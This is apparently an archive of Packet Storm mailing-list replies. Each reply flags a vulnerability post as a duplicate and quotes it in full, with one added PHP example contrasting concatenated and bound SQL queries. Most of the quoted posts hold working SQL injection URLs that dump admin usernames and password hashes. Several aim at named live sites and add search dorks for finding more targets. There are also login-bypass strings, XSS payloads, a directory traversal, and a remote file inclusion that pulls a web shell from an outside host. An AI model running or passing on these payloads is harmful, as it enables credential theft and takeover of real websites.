Re: joomla com_football Components Sql Injection vulnerability
Already discovered in 2008: http://packetstormsecurity.com/0807-exploits/joomlafootball-sql.txt 0da4ecb91d39a48ac8902c7cd277eaa8 The Joomla Football component suffers from a SQL injection vulnerability. Authored By Anonymous On Sun, Jun 30, 2013 at 11:08:51AM +, iedb.t...@gmail.com wrote: The joomla com_football Components suffers from a Sql Injection vulnerability. # #Iranian Exploit DataBase # http://exploit.iedb.ir # # Exploit Title : joomla com_football Components Sql Injection vulnerability # Author : Iranian Exploit DataBase # Discovered By : IeDb # Home : http://exploit.iedb.ir # Software Link : http://www.joomla.org # Security Risk : High # Tested on : Linux # Dork : inurl:index.php?option=com_football # # Exploit : # http://www.Site.com/index.php?option=com_footballtask=viewteamteamID=[Sql] # Dem0 : # http://www.cvhspreps.com/index.php?option=com_footballtask=viewteamteamID=-1+union+select+null,null,3,4,5,6,concat%20%28username,0x3a,password%29,8+from+jos_users+where+usertype=0x53757065722041646d696e6973747261746f72-- # http://www.sv-gruenbach.at/index.php?option=com_footballtask=viewteamteamID=-1+UNION+SELECT+1,2,group_concat%28username,0x3a,password%29,4,5+from+jos_users-- # # Exploit Archive : http://exploit.iedb.ir/exploits-155.html #
Facebook Information Disclosure
Worth Reading: http://packetstormsecurity.com/news/view/22713/Facebook-Where-Your-Friends-Are-Your-Worst-Enemies.html https://www.facebook.com/notes/facebook-security/important-message-from-facebooks-white-hat-program/10151437074840766
Re: SQL injection vulnerability in 360 Web Manager
Already discovered 01/2008. http://packetstormsecurity.org/0801-exploits/360-sql.txt 904cc6b6c4da1afe893909ea684ba118 360 Web Manager version 3.0 suffers from a SQL injection vulnerability. Authored By Ded MustD!e (innos_got[at]rambler.ru) On Tue, May 25, 2010 at 07:47:45PM +0200, advis...@htbridge.ch wrote: Vulnerability ID: HTB22379 Reference: http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_360_web_manager_1.html Product: 360 Web Manager Vendor: 360 Web Manager Vulnerable Version: 3.0 Vendor Notification: 10 May 2010 Vulnerability Type: SQL Injection Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response Risk level: Medium Credit: High-Tech Bridge SA (http://www.htbridge.ch/) Vulnerability Details: The vulnerability exists due to failure in the /adm/content/webpages/webpages-form-led-edit.php script to properly sanitize user-supplied input in IDFM variable. Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/adm/content/webpages/webpages-form-led-edit.php?IDFM=-1+ANY_SQL_HERE+--+
Re: phpPollScript - 1.3 Remote File Include
stolen/copied. http://packetstormsecurity.org/0909-exploits/phppollscript-rfi.txt 67daecae41e8707794f089bf6128efd0 phpPollScript versions 1.3 and below suffer from a remote file inclusion vulnerability. Authored By cr4wl3r (cr4wl3r[at]linuxmail.org) On Sun, Dec 20, 2009 at 11:43:25AM -, ad...@ekin0x.com wrote: #phpPollScript = 1.3 Remote File Include Vulnerability #Download Script : http://download.tomex.org/phpPollScriptv13b.zip #Author : ZZxxHackerzzXX #Contact : ad...@ekin0x.com #Location : Turkey #file : # init.poll.php # line 2 $inc_path = dirname($include_class); # line 3 require ($inc_path."/voting.poll.php"); #3xplo!t : #http://target.com/[path]/php/init.poll.php?include_class=http://www.ekin0x.com/c99.txt? #e...@ekin0x.com (all crew shell)
Re: WX Guest Book 1.1.208 (SQL/XSS) Multiple Remote Vulnerabilities
Completely stolen/copied. http://packetstormsecurity.org/0909-exploits/wxguestbook-sqlxss.txt 29598ed23c2831346a48aeb6fbdb3605 WX Guest Book version 1.1.208 suffers from remote SQL injection and cross site scripting vulnerabilities. Authored By learn3r (damagicalhacker[at]gmail.com) On Sun, Dec 13, 2009 at 12:45:17PM -, ad...@ekin0x.com wrote: ### # WX Guest Book 1.1.208 Vulns # # By xxHackerXzX hacker from nepal # # ad...@ekin0x.comm # ### Product name: WX Guestbook 1.1.208 Product vendor: http://www.ekin0x.com/r57.txt This product suffers from multiple SQLi and persistent XSS vuln. ## SQL Search Vuln ### The search parameters/queries we submit to the search.php are unsanitized and hence this can be compromised to SQLinject the server. SQL query: $signs = DB_Execute("SELECT * FROM `wxgb_signs` WHERE (`sign` LIKE '%" . $QUERY . "%') ORDER BY `code` DESC"); The $QUERY is what we submit through search box so injecting this will sql inject the server. The following is the sample sql injection example. Sample search string: test%') UNION ALL SELECT 1,2,concat(@@version,0x3a,user(),database()),4,5,6,7,8,9,10,11,12/* ## SQL login bypass ### The username and password fields are unsanitized and hence we can bypass the login systems. Username: admin'))/* Password: learn3r [or whatever] Or Username: ')) or 1=1/* Password: learn3r [or whatever] ## Persistent XSS Vulns ## In the name field (I suppose as I don't understand arabic), you can inject XSS... scriptalert(String.fromCharCode(97));/script scriptlocation.replace(http://www.ekin0x.com;)/script
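The search query quoted in the message above, next to a bound-parameter form of the same lookup. This is an added example, not code from the original post or from WX Guest Book: the table and column names come from the quoted query, while the function names, the sample rows and the use of an in-memory SQLite database through PDO (standing in for the application's MySQL backend) are assumptions.

```php
<?php
// Added example. wxgb_signs / sign / code are taken from the quoted query;
// the rows, function names and SQLite backend are constructed for the demo.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE wxgb_signs (code INTEGER PRIMARY KEY, sign TEXT)');
$ins = $db->prepare('INSERT INTO wxgb_signs (sign) VALUES (?)');
foreach (["Greetings from O'Brien", 'Great site', '100% agree'] as $row) {
    $ins->execute([$row]);
}

// Pattern from the advisory: the search term is concatenated into the SQL
// text, so a quote character in it changes the structure of the statement.
function search_concatenated(PDO $db, string $query): array
{
    $sql = "SELECT * FROM wxgb_signs WHERE (sign LIKE '%" . $query . "%') ORDER BY code DESC";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: the statement text is fixed and the term is bound as data.
// LIKE wildcards in the term are escaped so '%' and '_' match literally.
function search_bound(PDO $db, string $query): array
{
    $term = strtr($query, ['!' => '!!', '%' => '!%', '_' => '!_']);
    $stmt = $db->prepare(
        "SELECT * FROM wxgb_signs WHERE (sign LIKE :term ESCAPE '!') ORDER BY code DESC"
    );
    $stmt->execute([':term' => '%' . $term . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Ordinary visitor input: an apostrophe and a literal percent sign.
foreach (["O'Brien", '100%'] as $input) {
    try {
        $rows = count(search_concatenated($db, $input));
        printf("concatenated %-8s => %d row(s)\n", $input, $rows);
    } catch (PDOException $e) {
        // The apostrophe terminated the string literal early.
        printf("concatenated %-8s => statement broken by input\n", $input);
    }
    printf("bound        %-8s => %d row(s)\n", $input, count(search_bound($db, $input)));
}
```

A harmless apostrophe breaking the concatenated statement is the same defect the advisory describes; the bound version returns the matching row for both inputs.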
Re: E-Store SQL Injection Vulnerability
Previously discovered: http://packetstormsecurity.org/0812-exploits/estore-sql.txt 856a5dc9cba52e892cbb54bd2e1a0a82 getaphpsite e-store suffers from a remote SQL injection vulnerability in SearchResults.php. Authored By ZoRLu (trt-turk[at]hotmail.com) On Fri, Dec 11, 2009 at 05:50:54AM +0100, Salvatore Fresta aka Drosophila wrote: E-Store SQL Injection Vulnerability Name E-Store Vendor http://www.getaphpsite.com Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2009-09-03 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX VI. DISCLOSURE TIMELINE I. ABOUT THE APPLICATION E-Store is a commercial PHP e-commerce. II. DESCRIPTION This application presents a SQL Injection bug. III. ANALYSIS Summary: A) SQL Injection A) SQL Injection The GET where parameter passed to SearchResults.php is not properly sanitised. Because of the affected query, the Magic Quotes GPC flag (php.ini) may be on. IV. SAMPLE CODE http://site/path/SearchResults.php?SearchTerm=where=ItemName UNION ALL SELECT 1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16%23ord1=ItemNameord2=ascsearch1=Go! V. FIX No patch.
Packet Storm is back online.
We had a provider outage but the site is now back online.
Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection
Already discovered in June, 2008. http://packetstormsecurity.org/0806-exploits/joomlajoomradio-sql.txt bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio component version 1.0 suffers from a remote SQL injection vulnerability. Authored By His0k4 (His0k4.hlm[at]gmail.com) On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote: ### # Advisory X # Title: Joomla Component com_joomradio SQL Injection # Author: 0o_zeus_o0 ( Arturo Z. ) # Contact: arturo_zamor...@hotmail.com # Website: www.securitybroken.com # Date: 18/02/09 # Risk: Medium # Vendor Url: http://ajaxportal.eu/ # Affected Software: JoomRadio # autor script:author XrByte i...@exp.ee, Grusha gru...@feellove.eu ## # #Example: ## #htp:// victimurl.com/pathjoomla/index.php?option=com_joomradiopage=show_radioid=-1UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user() FROM jos_users-- # ## #greetz: # # original advisorie: http://www.securitybroken.com ##
Re: Joomla Component GameQ
Already discovered: http://packetstormsecurity.org/0806-exploits/joomlagameq-sql.txt 6d9a99abd76c7d48c68ea5c98d952844 The Joomla GameQ component versions 4.0 and below suffer from a SQL injection vulnerability. Authored By His0k4 (His0k4.hlm[at]gmail.com) On Thu, Dec 04, 2008 at 08:20:16AM -0700, [EMAIL PROTECTED] wrote: # Joomla Component GameQ # # # #AUTHOR : Sina Yazdanmehr (R3d.W0rm) # #Discovered by : Sina Yazdanmehr (R3d.W0rm) # #Our Site : Http://IRCRASH.COM # #IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr) - Hadi Kiamarsi # # # # #Download : http://joomlacode.org/gf/project/gameq # # # #DORK : inurl:option=com_gameq # # # # # [Bug] # # # #http://Site/[path]/index.php?option=com_gameqtask=pagecategory_id=-+union+select+0,1,2,3,4,5,username,password,8,9,10,11,12,13+from+jos_users/* # # # # Site : Http://IRCRASH.COM # ## TNX GOD ##
Re: News Manager Remote SQL Injection Vulnerability
Discovered over a year ago. http://packetstormsecurity.org/0705-exploits/prenews-sql.txt 0bae5b1d6f9d99c6749403341807f0d8 Pre News Manager version 1.0 suffers from a remote SQL injection vulnerability. Homepage: http://www.cyber-security.org/ On Thu, Oct 09, 2008 at 12:21:25PM +0300, Ghost hacker wrote: # News Manager Remote SQL Injection Vulnerability # # © Ghost Hacker , Real Hack Back :) # #[~] Author : Ghost Hacker # #[~] Home page : www.Real-h.com [Real Hack Back] # #[~] Contact Me : [EMAIL PROTECTED] # #[~] Bug : SQL Injection # #[~] From : Kingdom Saudi Arabia # #[~] Name Script : News Manager # #[~] Download : http://www.preprojects.com/news.asp # #[~] Dork : # # ©2006 PRE NEWS MANAGER | All Rights Reserved Or inurl:news_detail.php?nid= # #[~] Exploit : # # http:///news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin-- #[~] live demo : # # http://www.preproject.com/news manager/news_detail.php?nid=-139+UNION+SELECT+1,2,concat(login,0x3a,password),3,5,6,7+from+admin-- #[~]Greets : # # Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , LJ TeaM # # Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr , PrO SpY , v4-team.com # # All Members Real Hack , All My Friends :) # # Viva Real Hack - Real-h.com .. #
Re: E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability
Already discovered: http://packetstormsecurity.org/0809-exploits/ephpb2b-sql.txt cceb7b553c51129e88d5553fdcb5129d E-PHP B2B Trading Marketplace Scripts suffers from a remote SQL injection vulnerability in listings.php. Homepage: http://www.darkc0de.com/ Authored By r45c4l (r45c4l[at]hotmail.com) On Wed, Sep 10, 2008 at 03:07:37PM +0300, hussin x wrote: |___| | | E-Php B2B Trading Marketplace(cid) Remote SQL Injection Vulnerability | |___ |-Hussin X--| | |Author: Hussin X | |Home : WwW.Hussin-X.CoM | www.tryag.cc/cc | |email: darkangel_g85[at]Yahoo[DoT]com | | | |___ | | | | script : http://www.ephpscripts.com | |___| Exploit: www.[target].com/Script/listings.php?browse=sellcid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- L!VE DEMO: : INFO http://www.ephpscripts.com/demo/b2b/listings.php?browse=sellcid=-1+union+select+1,concat(user(),version(),database()),3,4,5,6,7,8+FROM+ephpb2b_members-- http://www.ephpscripts.com/demo/b2b/listings.php?browse=sellcid=-1+union+select+1,concat(es_username,0x3e,es_password),3,4,5,6,7,8+FROM+ephpb2b_members-- ( Greetz )_ | |All members of the Forum WwW.Hussin-X.CoM | WwW.TrYaG.CC | | My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr | | Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | mos_chori |__ Im IRAQi
Re: Remote SQL Injection
Discovered back in May. http://packetstormsecurity.org/0805-exploits/airvaecommerce-sql.txt 8c7afd46a5774569aea14a39556d6bbd AirvaeCommerce version 3.0 suffers from a SQL injection vulnerability. Homepage: http://www.root-qtr.com/ Authored By QTRinux (qataro[at]hotmail.com) On Sat, Jun 28, 2008 at 05:33:49PM -, [EMAIL PROTECTED] wrote: Author :: Dr-Linux saidmoftakhar(at)gmx(dot)de Application :: AirvaeCommerce 3.0 Download :: http://www.airvaecommerce.com Dork 1 :: powered by AirvaeCommerce 3.0 [C o n t e x t]- Vulnerability: http://localhost/ path script / ?p=vzhpid= [SQL] Example : /?p=vzhpid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,concat(pwd,0x3a,email),47%20from%20usr%20where%20id=2/* Note : Some site used SELECT statements have a different number of columns about 45 . ---[End of context]
Re: Powered by gCards v1.46 SQL
Discovered May of 07. http://packetstormsecurity.org/0705-exploits/gcards-sql-exec.txt 92ba41159dda3c9c4cb68fea13c310fc gCards versions 1.46 and below SQL injection and remote code execution exploit. Homepage: http://www.w4ck1ng.com/ Authored By Silentz (silentz[at]w4ck1ng.com) On Fri, Apr 18, 2008 at 09:29:06PM -, [EMAIL PROTECTED] wrote: Powered by gCards v1.46 SQL # # # AUTHOR : TurkishWarriorr # # HOME : http://www.1923turk.org # # # # DORKS 1 : Powered by gCards v1.46 # DORKS 2 : gcards/ # ## EXPLOIT : gcards/getnewsitem.php?newsid=1+union+select+1,2,concat(username,char(45),userpass),4,5+FROM+gc_cardusers-- ## www.1923turk.org [EMAIL PROTECTED]
Re: Powered by Pagetool Ver (1.04-05-06-07)
Discovered in June '07: http://packetstormsecurity.org/0706-exploits/pagetool-sql.txt On Sun, Feb 24, 2008 at 10:00:41AM -, [EMAIL PROTECTED] wrote: Google search : www.1923turk.org Turkishwariorr Powered by Pagetool Ver 1.04 Powered by Pagetool Ver 1.07 Powered by Pagetool Ver 1.05 Powered by Pagetool Ver 1.06 Append to the site URL : index.php?name=pagetool_newsnews_id=-1/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,passwd),2,3,4,5/**/FROM/**/pt_core_users/**/WHERE/**/groups/**/LIKE/**/0x2561646D696E25/*
Re: XOOPS Module wflinks SQL Injection(cid)
fyi - duplicate of http://packetstormsecurity.org/0704-exploits/xoopswflinks-sql.txt On Mon, Feb 18, 2008 at 05:19:20PM -, [EMAIL PROTECTED] wrote: ### # #XOOPS Module wflinks SQL Injection(cid) # ### # # AUTHOR : [EMAIL PROTECTED] # # HOME 1 : http://www.milw0rm.com/author/1334 # # MAIL : [EMAIL PROTECTED] # # # DORK 1 : allinurl: modules/wflinks/viewcat.php # # DORK 2 : allinurl: modules/wflinks # example http://xx.com/modules/wflinks/viewcat.php?cid= [exploit] EXPLOIT : -88%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/char(117,115,101,114,110,97,109,101,58),concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*%20where%20admin%20pass%20 # [EMAIL PROTECTED] i AM NOT HACKER [EMAIL PROTECTED]
Re: Vwar New Bug
Basically a dup of http://packetstormsecurity.org/0608-exploits/vwar150multi.txt On Wed, Feb 13, 2008 at 10:50:53AM -, [EMAIL PROTECTED] wrote: Vendor : Www.Vwar.De Credits : Pouya_Server Vuln. Ver : v1.5.0 Http://pouya-server.blogfa.com [EMAIL PROTECTED] --- http://[host]/vwar/war.php?s=[SQL] http://[host]/vwar/war.php?page=[SQL] http://[host]/vwar/war.php?showgame=[SQL] http://[host]/vwar/war.php?sortby=[SQL]
Re: Joomla multiple vulnerabilities (1.0.X = )
This exact mail was also sent out in July. http://packetstormsecurity.org/0707-exploits/joomla-sql.txt On Wed, Sep 26, 2007 at 07:09:17PM -, [EMAIL PROTECTED] wrote: Hello Joomla multiple vulnerabilities Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : security (at) soqor (dot) net Affected Versions 1.0.X - tested on 1.0.12 and 1.5 maybe affected - not tested but probably affected sql injection administrator/popups/pollwindow.php?pollid=1%20union%20select%20password %20from%20jos_users/* Full path Many many in includes/ Examples includes/Cache/Lite/Output.php includes/patTemplate/patTemplate/Stat.php includes/patTemplate/patTemplate/OutputFilter.php includes/patTemplate/patTemplate/OutputCache.php includes/patTemplate/patTemplate/Modifier.php includes/patTemplate/patTemplate/Reader.php includes/patTemplate/patTemplate/TemplateCache.php .. ETC GrEEtZ : DeviL-00 , Dr.ExE , GaCkeR , Sp1deR_Net , Black AttaCk , MiniMan , JareeH BaghdaD , Le Copra; Special GrEEtZ For : MohAjali AnD SoQoR.NeT TeaM AnD MemberS; End of it :) WwW.SoQoR.NeT
Re: GPhotos 1.5 Multiple vulnerabilities
This directory traversal has already been discovered. http://packetstormsecurity.org/0605-exploits/gphotos.txt f4e2552282a5007bb84e7693bc78dac2 GPhotos versions 1.5 and below suffer from directory traversal and cross site scripting flaws. Authored By Moroccan Security On Sat, Nov 18, 2006 at 09:19:01PM -, [EMAIL PROTECTED] wrote: 18/11/06 # Vulnerable product : GPhotos 1.5 # Official product site : http://photopeyu.free.fr/ # Vulnerabilities : 1] Multiple Full path disclosure : http://localhost/photos/index.php?rep=tux25 2] Directory traversal : http://localhost/photos/index.php?rep=../ ~Tux25 - tux025_gmail_point_com :)